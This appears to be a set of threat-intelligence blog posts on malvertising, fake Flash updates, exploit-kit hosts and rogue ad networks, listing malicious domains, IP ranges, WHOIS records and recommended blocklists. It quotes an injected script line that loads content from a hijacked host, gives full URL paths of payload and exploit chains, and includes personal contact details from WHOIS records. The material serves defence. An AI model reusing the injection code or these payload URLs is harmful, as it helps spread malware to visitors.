Evil network: 184.154.28.72/29 (Marko Cipovic / Singlehop) and liveadexchanger.com

liveadexchanger.com is an advertising network with a questionable reputation currently hosted on a Google IP of 146.148.46.20. The WHOIS details are anonymous, never a good sign for an ad network.

Seemingly running ads on the scummiest websites, liveadexchanger.com does things like trying to install fake Flash updates on visitors computers, as can be seen from this URLquery report... you might find the screenshot missing because of the complex URL, so here it is..

That landing page is on alwaysnewsoft.traffic-portal.net (part of an extraordinarily nasty network at 184.154.28.72/29) which then forwards unsuspecting visitors to a fake download at intva31.peripheraltest.info  which you will not be surprised to learn is hosted at the adware-pusher's faviourite host of Amazon AWS.

Of the 567 sites that have been hosted in this /29 (not all are there now), 378 of them are tagged as malicious in some way by Google (67%) and 157 (28%) are also tagged by SURBL as being malicious in some way. Overall then, 74% are marked as malicious by either Google or SURBL, which typically means that they just haven't caught up yet with the other bad domains. The raw data can be seen here [pastebin].

At the time of writing, the following websites appear to be live:

check4free.newperferctupgrade.net
testpc24.onlinelivevideo.org
getsoftnow.onlinelivevideo.org
newsoftready.onlinelivevideo.org
whenupdate.plugin2update.net
alwaysnew.updateforeveryone.net
free2update.newsafeupdatesfree.net
liveupdate.update4free.org
downgradepc.update4free.org
noteupgrade.update4free.org
newupdate.digit-services.org
lastversion.whensoftisclean.org
newupdate.set4newsearchupdate.com
upd24.free247updatetoolnow.com
24check.plugin-search2update.com
check4upgrade.plugin-search2update.com
softwareupdate.plugin-search2update.com
updateauto.theinlinelive.net
newsoftready.set2updatesnen.net
alwaysnewsoft.traffic-portal.net
checksoft.new24checkupgrade.net
legalsoft.perfectsafeupdate.net
checksoft.group4updating.org
checksoft.thesoft4updates.org
netapp.safeplugin-update.org
freedlupd.pcfreeupdates.club
softwareupdate.upgrades4free.org
freechecknow.onlinelivevideo.org
liveupdate.os-update.club
newupdate.update4free.net
checksoft.newsafeupdatesfree.net
workingupdate.digit-services.org
now.how2update4u.com
autoupdate.whenupgradeswork.com
setupgrade.set4freeupdates.xyz
update4soft.searchonly.online
updateauto.forfreeupgrades.org
autoupdate.soft-land.club
soft4update.soft-land.club
updateauto.newvideolive.club
newupdate.portal-update.club
maintainpc.perfectupdater.org
newupdate.downloadsoft24.club

The WHOIS details for this block:
%rwhois V-1.5:003eff:00 rwhois.singlehop.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:ORG-SINGL-8.184-154-28-72/29
network:Auth-Area:184.154.0.0/16
network:IP-Network:184.154.28.72/29
network:Organization:Marko Cipovic
network:Street-Address:Kralja Nikole 33
network:City:Podgorica
network:Postal-Code:81000
network:Country-Code:CS
network:Tech-Contact;I:NETWO1546-ARIN
network:Admin-Contact;I:NETWO1546-ARIN
network:Abuse-Contact;I:ABUSE2492-ARIN
network:Created:20150323
network:Updated:20150323

If you are using domain-based blocklists, this [pastebin] is the list of domains currently or formerly hosted on this block with the subdomains removed. Other than that, I would recommend the following blocklist:

liveadexchanger.com
184.154.28.72/29

Something evil on 5.135.211.52 and 195.154.69.123

This is some sort of malware using insecure OpenX ad servers to spread. Oh wait, insecure is pretty much the default configuration for OpenX servers..

..anyway, I don't know quite what it is, but it's running on a bunch of hijacked GoDaddy subdomains and is triggering a generic Javascript detection on my gateway. Domains spotted in this cluster are:

fart.somerspointnjinsurance.com
farms.somerspointnjinsurance.com
farming.somerspointnjinsurance.com
farma.risleyhouse.net
farmer.risleyhouse.net
farmers.risleyhouse.net
par.ecofloridian.info
papers.ecofloridian.com
papa.trustedelderlyhomecare.net
paper.trustedelderlyhomecare.org
pap.trustedelderlyhomecare.info
fas.theinboxexpert.com
fashion.theinboxexpert.com

The two IPs in use both belong to OVH France, but 5.135.211.52 is suballocated to QHoster Ltd (Bulgaria) [VT] and 195.154.69.123 is suballocated to Iliad Entreprises (France) [VT]. This second IP has also been used to host "one two three" malware sites back in May.

Recommended blocklist:
5.135.211.52
195.154.69.123
somerspointnjinsurance.com
risleyhouse.net
ecofloridian.info
ecofloridian.com
trustedelderlyhomecare.net
trustedelderlyhomecare.org
trustedelderlyhomecare.info
theinboxexpert.com

Something evil on 64.202.123.43 and 64.202.123.44

This is one of those ephemeral traces of malware you sometimes see, like a will-o'-the-wisp. Something seems to be there, but on closer examination it has vanished. But this isn't an illusion, it seems to be a cleverly constructed way of distributing malware which pops up and then vanishes before anyone can analyse it.

The source of the infection seems to be a malvertisement on one of those sites with an immensely complicated set of scripts running on all sort of different sites, including those low-grade ad networks that have a reputation for not giving a damn about what their advertisers are doing.

In this case, the visitor gets directed to a page at 12ljeot1.wdelab.com/ijvdg2k/2 which got picked up with a generic malware detection.. but by the time anyone gets to investigate the domain it is mysteriously not resolving.

What appears to be happening is that the bad guys are publishing the malicious subdomains only for a very short time, then they stop it resolving and they publish another one. And one thing all these domains have in common is that they are using afraid.org for nameserver services.

A bit of investigation shows that this malware is hosted on a pair of servers at 64.202.123.43 and 64.202.123.44 (HostForWeb, US), and despite that bad guys efforts they do leave a trace on services such as VirusTotal [1] [2] and URLquery [3]. This particular URLquery report shows indications of the Fiesta EK.

The attackers are covering their traces by using legitimate hijacked domains, the owners of which may not even be aware of the problem. Despite there being a large number of subdomains, I can only spot sixdomains being abused:

theholdens.org
denytech.com
jonmills.org
wdelab.com
dimatur.pt
hebel.ch

A full list of the subdomains that I have found so far can be found here [pastebin].

A look at the 64.202.123.0/24 block shows a mix of legitimate sites, plus some spammy ones and quite a lot that look malicious. If you are running a high-security environment then you might want to block this who range. Else, I would recommend the following minimum blocklist:

64.202.123.43
64.202.123.44
theholdens.org
denytech.com
jonmills.org
wdelab.com
dimatur.pt
hebel.ch

Something evil on 69.64.39.166

69.64.39.166 (Hosting Solutions International, US) appears to be hosting an exploit kit (possibly Fiesta) according to URLquery reports such as this one.

The code is being injected into target websites, possibly through a malvertising campaign. I would recommend blocking the IP address as the simplest option, although I can identify the following domains on that same IP, all of which are likely to be malicious.

advrzc.myftp.org

amyoau.myftp.biz

aokljwwsap.serveftp.com

bgocodwsiu.myftp.org

bpknbvmc.serveftp.com

cjhkxfpdw.serveftp.com

cvxeitw.serveftp.com

cxrhtcau.myftp.biz

czwaiys.myftp.org

dhdwjwve.myftp.org

djqlcce.myftp.org

drituglgjh.serveftp.com

drpmsmt.serveftp.com

ehetlmna.myftp.biz

euimho.serveftp.com

fvyzhy.serveftp.com

hljozqutc.myftp.org

hlwswbaap.serveftp.com

hwtlzdxic.serveftp.com

idoplhj.serveftp.com

iyrseedlt.myftp.biz

lkuvivr.myftp.biz

lxeoic.myftp.org

orrlnypdvz.myftp.biz

osuqlc.myftp.org

plwxycxij.myftp.org

pmkawqgvob.myftp.org

puifnjav.myftp.biz

sbrckuod.serveftp.com

thtnuj.myftp.biz

ucuqgd.myftp.org

uqqyscgq.myftp.org

uuzkpb.myftp.biz

welfcsuybw.serveftp.com

ykypxoub.myftp.org

yrziqui.serveftp.com

yxoiyjbjt.myftp.biz

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:

What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor.de/assets/rollover.js  as follows (click to enlarge):

In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:

document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';

..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:

    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some other party other than Adscend Media LLC may be responsible. This link comes up black when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:

..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, itlmeteo.it is the 29th most popular site in Italy and the 1305th most popular worlwide.

This URLquery report shows the scripts with the injected code:

The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

Something evil on 173.246.102.246

173.246.102.246 (Gandi, US) looks like it is being used for exploit kits being promoted either through malvertising or through exploited OpenX ad servers.

In the example I have seen, the malicious payload is at [donotclick]11.lamarianella.info/read/defined_regulations-frequently.php (report here). These other domains appear to be on the same server, all of which can be assumed to be malicious:

11.livinghistorytheatre.ca
11.awarenesscreateschange.com
11.livinghistorytheatre.com
11.b2cviaggi.com
11.13dayz.com
11.lamarianella.info
11.studiocitynorth.tv
11.scntv.tv

These all appear to be legitimate but hijacked domains, you may want to block the whole domain rather than just the 11. subdomain.

Something evil on 96.44.139.218 / perclickbank.org

There's something evil on 96.44.139.218 (OC3 Networks, US):

perclickbank.org
google-analitlcs.com
google-statistic.com
nailart4designs.com

Malvertising, basically. More details here.

Something evil on 66.45.251.224/29 and 199.71.233.226

The IP address 199.71.233.226 (Netrouting, US)  and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted:

network:Class-Name:network
network:ID:NETBLK-INTSRV.66.45.224.0/19
network:Auth-Area:66.45.224.0/19
network:Network-Name:INTSRV-66.45.251.224
network:IP-Network:66.45.251.224/29
network:Org-Name:Private Customer
network:Street-Address:Private Residence
network:City:Moscow
network:State:77
network:Postal-Code:119192
network:Country-Code:US
network:Created:20120701
network:Updated:20120816
network:Updated-By:abuse@interserver.net

The domains listed below are on those IP addresses, all appear to be disributing malware (see example) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat.

Update:  95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here).

Update 2:  Another IP in this cluster is 96.44.139.218 (OC3 networks, US), running malicious ads using the domain perclickbank.org (scroll down for more information)

1sedobazole.info
acpacompany.info
acpvcompany.info
adp.marketsamples.info
alladulttest.info
alttubesite.info
appvcompany.info
artsellernet.com
blabeladstarget.info
boldcpaportal.info
boldcpvportal.info
boldpopportal.info
boldppvportal.info
coldcpvportal.info
coldppvportal.info
cpaintermediary.info
cpamarketer.biz
cpappvportel.info
cpvtoolswork.info
cpvtoolwork.info
domycpa.info
domycpv.info
domyppv.info
ecpamarkets.info
ecpmmarkets.info
ecpvmarkets.info
egoodsstore.info
egoodystore.info
eppvmarkets.info
forcpamarkets.info
forcpmmarkets.info
frankinews.info
goladero.info
higeaisedo.in
hinsmart.ca
joyforcpa.info
joyforcpm.info
joyforcpv.info
joyforppv.info
juniorcpa.info
juniorcpm.info
juniorcpv.info
juniorppv.info
kabitopa.info
lowcost4hosting.info
marketsamples.info
marketsamplestore.info
nameurneeds.com
ppvadulttools.info
ppvcpaportal.info
ppvcpatools.info
ppvdatetools.info
ppvsystemgate.info
ppvsystemgateway.info
ppvsystemleadaway.info
ppvsystemnet.info
ppvsystemnetwork.info
ppvsystempointer.info
ppvsystemportal.info
ppvworktools.info
prolixppv.info
raberolasi.info
renaissancestylingstudio.com
rencai.com.ar
theforgottentruth1937.com
toolsforppv.info

Added: 6/10/12
adp.joyforppv.info
giantppv.info
giantcpa.info

Added: 10/10/12
highloadcpa.info
highloadppa.info
entry.highloadppa.info
giantppa.info
highloadpop.info
highloadcpv.info
highloadppv.info

Also, on  96.44.139.218:
perclickbank.org
google-analitlcs.com
google-statistic.com
nailart4designs.com

wetter.com compromised? oseparatekines.net and 81.17.24.69

The weather site wetter.com is the 25th most popular site in Germany (and nukber 602 in the world) according to Alexa.

Right at the moment there appears to be a compromised ad being served up by billabong3.wetter.com  redirecting to a exploit kit on [donotclick]oseparatekines.net/forum/index.php?showtopic=903878 hosted on 81.17.24.69 which is apparently hosted in Switzerland, belonging to a small netblock as follows:

inetnum:         81.17.24.64 - 81.17.24.95
netname:         CLIENT2391
descr:           CLIENT2391
country:         CH
admin-c:         JP5315-RIPE
tech-c:          JP5315-RIPE
status:          ASSIGNED PA
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

person:          James Prado
address:         Torres De Las Americas Torre C Floor 29 Suite 2901 Panama City, Panama
phone:           +5078365602
nic-hdl:         JP5315-RIPE
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

route:           81.17.16.0/20
descr:           Ripe Allocation
origin:          AS51852
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

The following domains are hosted on that IP address and you should assume they are malicious:
pilotjobsingrash.org
oseparatekines.org
onlineswotchers.org
fishersmansslow.org
oseparatekines.com
swstockhers.com
pilotjobsingrash.in
pilotjobsingrash.info
webswedish.info
oseparatekines.net
onlineswotchers.net

The entire 81.17.24.64/27 range looks suspicious in my opinion. Blocking that range would probably be prudent.

You can see the full script that is being used in the attack here - http://pastebin.com/CMuUm05f

Wire Transfer spam / porschedesignrussia.ru

This fake wire transfer spam leads to malware on porschedesignrussia.ru:

Date:      Fri, 20 Jul 2012 04:10:52 +0100
Subject:      RE: Your Wire Transfer N02526593

Good morning,

Wire debit transfer was canceled by the other financial institution.



Canceled transfer:

FED REFERENCE NUMBER: ISL9653367088ODP06829K

Transfer Report: View



Federal Reserve Wire Network

The malicious payload is at [donotclick]porschedesignrussia.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186

These are the same IP addresses as used in this attack from yesterday. Blocking them would probably be prudent.

Evil network: MAXHOSTING Services, kfppp.com and the BBC Radio 3 compromise

MAXHOSTING are a fairly prolific evil network that I profiled last month, so it isn't a huge surprise to see that the evilness continues as normal.

But one thing that made MAXHOSTING stand out today was their involvement in an apparent compromise on the BBC's website, as reported by The Register.  Google have labelled the BBC's Radio 3 subsite as being potentially dangerous:

Safe Browsing
Diagnostic page for bbc.co.uk/radio3

What is the current listing status for bbc.co.uk/radio3?

    Site is listed as suspicious - visiting this web site may harm your computer.

    Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

    Of the 15 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-09, and the last time suspicious content was found on this site was on 2010-09-09.

    Malicious software is hosted on 1 domain(s), including kfppp.com/.

    1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including z145235.infobox.ru/.

    This site was hosted on 1 network(s) including AS2818 (BBC).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, bbc.co.uk/radio3 did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

    No, this site has not hosted malicious software over the past 90 days.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

So, what do we know about kfppp.com? Well, it was registered one day ago via black hat domain registrar BIZCN to a fake recipient, and is hosted on a server at 77.78.240.253, which is in Maxhosting's range.. so obviously this is nothing good.

The trouble is that the BBC site seems clean and it is not apparent where the infection is coming from, but the BBC site does carry ad banners for non-UK visitors, and it seems possible that a malvertisement somewhere is to blame. Although Google does sometimes make false positives, this particular report is very specific and I tend to believe that the BBC Radio 3 site is (or was) compromised with malicious code.

A full breakdown of current sites, IP addresses and MyWOT reputations can be downloaded from here.

The best advice is to completely block traffic to 77.78.239.x and 77.78.240.x (or better still, the 77.78.224.0/19 parent block), or block traffic to the domains below.

Divambee35.net
Eagen85.net
Forceclub-us.com
Forceclub-us.net
Indep29.com
Investbabaika.com
Janoodle6.net
Levelin29-online.com
Levelin29-web.com
Levelin29.biz
Levelin29.com
Levelin29.net
Levelin29.org
Levelin29.us
Secsslup.com
Trazi.in
Zabil.in
Search-static.org
Vostokgear.org
The-funny-world.info
Francecore.com
Genreystick.com
Grand-vitaro-club.com
Odistanyachts.com
Statxonline.com
Xsbot.net
Planopetroleumteam.com
Acunetxweb.net
Gvist.org
Gvistello.net
Dottasink.net
Nowisisdudescars.com
Vancouvererrorsonfile.com
Whereisdudescars.com
Zettapetta.net
Google-server09.info
Google-server10.info
Google-server11.info
Google-server12.info
Google-server14.info
Google-server29.info
Google-server31.info
Google-server41.info
Google-server42.info
Google-server43.info
Jhuiuhxfgxhlfkjhjth.info
Jhuiuhxfgxhtfkjhjth.info
Jhuluhxfgxhlfkjhjth.info
Top-teen-porn.info
Traxbax.com
Gumile.in
Pro100-soft.net
Geerht.com
Ruslan7777.com
Hyporesist.com
Installs.tv
Thefriends-place.info
Thefunny-world.info
Easy-answers.info
Theeasy-answers.info
Vstils.ru
Clickwebanalitick.com
Hotporncatalog.com
Ns3emeringo.com
Thevipbuyconterst.com
Youngirlsactions.com
Ciougmxehgjesk.com
Kingdol.com
Pcf-osow.com
Pw2.info
Reservus.com
Server90.org
Homesiteuk.com
Narmedic.org
Pp24.biz
403403.net
Firmar.org
Cebere.net
Cebere.org
Ceberz.net
Ceberz.org
Ceterz.biz
Eccinput.com
Faststat.biz
Mainstatserver.com
Bestviewbar.net
Thestatserver.com
Angelx.info
Deltav.info
Fantasyv.info
Fantasyx.info
Francisx.info
Freel.info
Freev.info
Jeffreyl.info
Lmailing.info
Millionsincomingfrom.biz
Weaponx.info
Xcorps.info
Checkege.ru
Otvetege.ru
Sdalege.ru
Stylysxvk.ru
Vkxstile.ru
1-aa.com
Atringroup.com
Awejkgf.com
Winterleaf.org
Free-pac.net
Tsbd1984.com
Fornaticumlili.biz
Dwnld0020.com
Spmfb2299.com
Thephotos-galleries.info
Hosting-backup.org
Darksiti.net
Asmatrin.com
Mvk.net.ru
Mvk.net.ru
Mynewspages.com
Newsdownloads.cn
Nvk.net.ru
Nvk.net.ru
Rsite.net.ru
Rsite.net.ru
Supercarsinfo.net
Vkhost.net.ru
Vkhost.net.ru
Webvk.net.ru
Webvk.net.ru
Sec-stats.org
Eu-analytics.com
Google-stat.org
Auto-russo-trah.com
55echosend.com
66kooum.com
Avilantup.com
Bytrin.com
Club-world-auto.org
Erityng.com
Govenablog.org
Grebtiklop.com
Hercegovinablog.org
Horsebloggovena.org
Horseblogovena.org
Horsegovena.org
Janesblog.org
Nikranox.org
Roxenda.com
Zrefkilops.com
Activateoursoft.com
Graymageds.com
Orangeosol.com
Yellowaven.com
3423254353446.org
Myteen2011.com
Onrpg-cdn.com
Sed-machinery.com
Helpsupport.biz
Connectionsupport.org
Cansbass.com
Cheni.in
Coani.in
Decdo.in
Jaddf.com
Baffyko.com
Ddret.com
Fgtre.com
Gddff.com
Kkrrn.com
Poiiu.com
Rtyyv.com
Ssadf.com
Ssweq.com
Yyeed.com
Yyutr.com
Ghdre.com
Kvxxr.com
Rchjj.com
Krnnt.com
Kvccg.com
Rcggu.com
Rcsss.com
Wrrrt.com
1host4me.ru
Fun-gsm.ru

"Anatomy Of An Attempted Malware Scam"

If you work in IT Security then malicious ads are a regular pain in the backside.. and you probably wonder why "reputable" ad networks get talked into running them. This article is possibly the best thing I have read on the problem, written from the ad network's point of view. It seems the Bad Guys do go to extraordinary lengths to try to look genuine, but sometimes the simplest checks can reveal that they are not what they seem.

Hat Tip

FarmTown, impressionclub.com and justimpression.com

Sandi at Spyware Sucks reports that the popular(ish) Facebook game of FarmTown (not FarmVille) has be compromised, possibly through a malicious banner.

The domain justimpression.com has been fingered as part of the malware chain, registered to the infamous "Private person" of:

Registrant:
Private person
Armand Gregori (armandgregory3@gmail.com)
Federicsshopen via 3
Katowice
Katowice,S589FG
PL
Tel. +34.41528965

Creation Date: 17-Dec-2009
Expiration Date: 17-Dec-2010

Domain servers in listed order:
ns2.reg.ru
ns1.reg.ru

That email address is pretty well known for malware distribution.

The site is hosted on 64.120.176.42 along with a site called impressionclub.com. "Impression Club" claims to be a Pennsylvania based company that has been in business for four year, except the domain was only registered in January 2010 with anonymous contact details, and Russian nameservers.


You can probably count impressionclub.com as a rogue ad network and one to avoid.

The FarmTown developers have a forum thread about the problem (one poster identifies an ad for greetingcards.com as the culprit) and there are several threads on Facebook about this [1] [2] [3] [4] [5] which also point at the following domains as being part of the chain

• scan-and-protect3.com
• scan-and-protect5.com
• scan-and-protect7.com
• scan-and-protect8.com
• scan-and-remove10.com
• scan-and-remove55.com
• scan-and-remove99.com
• 1server-antivirus.com
• 2server-antivirus.com
• 4server-antivirus.com
• 6server-antivirus.com
• 1web-antivirus.com
• 2web-antivirus.com
• try6-your-scanner.com
• 111-your-scanner.com
• 222-your-scanner.com
• basketballtickets2.com
• batman2010.com
• spread2010.com
• terminator-2010.com

All these domains are registered with apparently false details, there are probably a bunch more but I'm having difficult resolving the IPs at the moment.

This could be a fairly big deal, Quantcast reports that justimpression.com has a traffic rank of 6,227 and pulled in 329,000 US visitors during February.


This is another good reason to block Facebook in corporate enviroments, and also a useful warning that you need to be very, very careful when selling ad space!

More fake ad networks

The German news site Handelsblatt was recently the victim of a malvertising campaign:

02.02.2010 Handelsblatt malware on Web site

Update: Infection banners confirmed!

The S-CERT was able to reproduce the infection in its test laboratory on the IHT website. Infection occurs through an advertising banner, which is from "Doubleclick.net. This will in turn include advertisements from the domain "muentely.com" in the Handelsblatt-page insert. The latter site is obviously manipulated and contains malicious JavaScript code.

Further investigations in the S-CERT laboratory testing have confirmed that will be used including a PDF vulnerability to the spread of malware. The studies also show that there is an alternative to the vulnerability, attempts to exploit gaps by further appropriate attack code to install a malware onto vulnerable PCs.

According to the investigations of the S-CERT is the malware with the accessing PCs will eventually become infected, a so-called Scareware: Users are informed by insertion of appropriate dialogue, that their PC is infected with malware wide area. To remove this malware, an appropriate protective software is available for purchase. To give emphasis to the malware message that ensures Scareware that can be started on any new applications over infected PCs. Relevant information of users may also indicate an infection.

The malware campaign was running via Doubleclick and Nuggad.net, directing through a bunch of domains that look like ad agencies but aren't before ending up in a server in Panama.

The fake ad agencies are in the 213.163.75.x range, all recently registered through BIZCN.COM in China, a fairly well known black hat registrar.

Note that while the domains appear to be fake, the registration data may include the details of innocent third parties, so I have not published it here. I would recommend avoiding doing business with them unless you can absolutely verify their credentials.
Synopsystd.com

• Namdoline.com
• Quintat.com
• Bradfortnd.com
• Ealana.com
• Rovitalt.com
• Favorti.com
• Muentely.com
• Briarmod.com
• Deltamsc.com
• Jessiereet.com
• Startrailrs.com
• Connata.com
• Vehiced.com
• Essiell.com
• Holdrism.com
• Bellwaynetworks.com
• Forlifemedia.com
• Revoltechmarketing.com
• Hickoryhs.com
• Ingramctc.com
• Luxortd.com
• Morrelmedia.com
• Gappion.com
• Savoyee.com
• Goldbaynetwork.com

AdSlash.com is a bogus ad network

We've seen a number of ads being punted through AdSlash.com to legitimate ad networks, but it appears that these are leading to a PDF Exploit (don't visit these sites, obviously!).

For example:
fwlink.nx7.zedo.com.adslash.com/?alx=a27131939386&td=qcbp71pz=42834&sz=728x90&_zm=359161&st=n1n4&id=131939386&zcw=gh17chl277&xryr=3913771&mp=1460h1
fwlink.nx7.zedo.com.adslash.com/stats_js_e.php?id=131939386
fwlink.nx7.zedo.com.adslash.com/bdb/Health/banner_728.gif
fridayalways.com/kven/index.php
fridayalways.com/kven/js/common.js
fridayalways.com/kven/pdfadmnplay.php
fridayalways.com/kven/files/backoutblack.pdf

or

fwlink.nx7.zedo.com.adslash.com/?alx=a27131959519&td=qcbp71pz=42834&sz=120x600&_zm=359161&st=n1n4&id=131959519&zcw=gh17chl277&xryr=3913771&mp=1460h1
uparms.com/uparmglde/index.php
uparms.com/uparmglde/js/zingvaz.js
uparms.com/uparmglde/sexxhsdtk.php
which then loads a PDF exploit

or

fwlink.nx7.zedo.com.adslash.com/?alx=a27131958218&td=qcbp71pz=42834&sz=300x250&_zm=359161&st=n1n4&id=131958218&zcw=gh17chl277&xryr=3913771&mp=1460h1
setsup.com/setglde/index.php
setsup.com/setglde/js/common.js
setsup.com/setglde/ffcollab.php
setsup.com/setglde/files/slob.pdf

Despite the use of "zedo.com" in the subdomain, there is no evidence that these are being syndicated through Zedo.

Let's look at the WHOIS entry for AdSlash.com first:

Domain name: adslash.com

Registrant Contact:
PublishingAlert
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Administrative Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Technical Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Billing Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2010-01-04
Expires: 2011-01-04

The address looks kind of legitimate, but there's no Duck Creek Road in Oakland and the phone number is most likely Los Altos, not Oakland. Also the fact that it has been registered just days ago is a clue.. and it turns out that the registrar is BIZCN.COM of China which is an odd choice for a California company.. in other words, the domain registration details are fake.

AdSlash.com is hosted on 217.23.7.6 which is reportedly a Worldstream Data Center in Faro, Portugal. There's a cluster of servers with fake registration details which are probably related:

217.23.7.6
Adslash.com
Dc2way.com
Ispmns.com
Rtcohost.com
Vpsroll.com

217.23.7.7
Net-wisp.com
Realhgost.com
Slhoste.com

217.23.7.8
Inhostin.com
Nx7tech.com
Vpbyte.com

217.23.7.9
Eywtech.com
Qhostin.com
Sslcode.com

Blocking the entire 217.23.7.x range will probably do no harm at all, it is full of typosquatting domains and other crap.

The PDF exploit itself is hosted in Russia on 213.108.56.18 at Infoteh Ltd (UNNET-LINER), there are a bunch of domains serving these exploits up:

• alwaysinwork.com
• fridayalways.com
• runsup.com
• uparms.com
• upmostly.com

WHOIS details show the infamous moldavimo@safe-mail.net email address.

Registrant:
Name: dannis
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610

Administrative Contact:
Name: dannis
Organization: privat person
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610
Phone: +7.9957737737
Fax: +7.9957737737
Email: moldavimo@safe-mail.net

Technical Contact:
Name: dannis
Organization: privat person
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610

The whole UNNET-LINER netblock of 213.108.56.0 - 213.108.63.255 looks fairly sordid, blocking access to it will probably do no harm.

As a side note, AdSlash.com did used to be owned by a hosting company called RackSlash, but it expired and was re-registered.

If you are accepting new ad banners - always remember to look closely at WHOIS details and other credentials to ensure that you are dealing with who you think you are.

zoombanner.com / YieldManager malvertisement on ebuddy.com

ebuddy.com is running a malicious ad on the zoombanner.com domain, apparently managed by Yieldmanager.

First, the "legitimate" end of the malware chain loads at ad.zoombanner.com/content?campaign=1171557&sz=6
This forwards to deliver.commismanderakis.com/rotate?m=2;b=6;c=1;z=585778
Which goes to content.fishpotboutademalled.com/track/3388182/S_IT?[snip]
Then img.commismanderakis.com/img?XAhIPWtICDkJX0FVHXUDKFoRYhYlRxFCNlsBGEhLBEtVdRdiCRYKBA8kKV9RHBEaXFJfXFMHAQ
Followed by the payload domain at jduvazuc.info/cgi-bin/dep
then jduvazuc.info/cgi-bin/dep/j006102Hd793447cR55e239b8T9cc338b5V0100f060203L69740000000000000000
then jduvazuc.info/cgi-bin/dep/o006102203317l0010Hd793447cR55e239b8T9cc338b6V0100f060
Finally jduvazuc.info/cgi-bin/dep/e006102203318l0010Hd793447cJ0d000601R55e239b8T9cc338a4U0ec2fc77V0100f0600

This last hop tries to load an executable (and probably some other crap I haven't spotted), not very well detected according to VirusTotal. Oh yes, there's a PDF exploit too.

The malicious ad is an Italian language vacation banner in this case.


Most of the domains have anonymous registration details, except zoombanner.com which has the same details that were used in the malicous ads featured here and here.

zoombanner.com

Registrant:
Domain Owner
15156 SW 5th
Scottsdale, Arizona 85260
United States

Domain Name: ZOOMBANNER.COM
Created on: 24-Jul-09
Expires on: 24-Jul-10
